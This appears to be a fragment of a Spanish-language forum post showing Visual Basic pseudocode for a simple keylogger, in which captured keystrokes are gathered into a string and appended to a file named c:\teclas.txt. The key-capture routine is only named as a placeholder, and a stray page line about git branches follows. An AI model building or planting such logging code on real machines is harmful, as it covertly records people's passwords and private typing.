TecN = Funcion para obtener las teclas
If TecN <> TecV Then
TecV = TecN
TecG = TecG & TecN
End If
open "c:\teclas.txt" for append as #1
print #1, TecG
close #1
TecG = ""
|
|||
Tema destacado: Trabajando con las ramas de git (tercera parte) |
|
|